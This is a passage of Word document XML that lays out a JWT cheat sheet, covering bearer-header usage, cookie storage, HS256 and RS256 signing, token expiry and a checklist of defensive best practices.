              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">━━━  HTTP USAGE  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="66C2FF"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> Authorization: Bearer &lt;jwt_token_here&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">━━━  STORAGE  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> ✅ httpOnly cookie</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B8A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    ❌ localStorage</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="FF6B8A"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">    ❌ sessionStorage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">━━━  ALGORITHMS  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> HS256 = symmetric (1 shared secret)    RS256 = asymmetric (private+public key)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve">━━━  EXPIRY  ━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="00D97E"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"/>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcBorders>
              <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:left w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
              <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
            </w:tcBorders>
            <w:shd w:fill="0E1521" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="20"/>
              <w:left w:type="dxa" w:w="280"/>
              <w:bottom w:type="dxa" w:w="20"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
                <w:color w:val="4D6080"/>
                <w:sz w:val="19"/>
                <w:szCs w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> Access token: 15 min–1 hr     Refresh token: 7–30 days</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="0" w:before="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:after="120" w:before="280"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0D1B3E"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">Security Best Practices — Memorise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4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8880"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Store JWT in httpOnly cookies, not localStorage</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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8880"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Always set an expiry (exp) claim on every token</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8880"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Use a strong random secret of at least 32 bytes for HS256</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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8880"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Consider RS256 for microservices (no shared secret)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8880"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Always validate the algorithm — never allow 'alg: none'</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center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">✅</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8880"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="FFFFFF" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="200"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="200"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1A1D2E"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Use HTTPS — never send tokens over plain HTTP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="480"/>
            <w:tcBorders>
              <w:top w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:left w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:bottom w:val="single" w:color="CCCCCC" w:sz="4"/>
              <w:right w:val="single" w:color="CCCCCC" w:sz="4"/>
            </w:tcBorders>
            <w:shd w:fill="E3F5ED" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
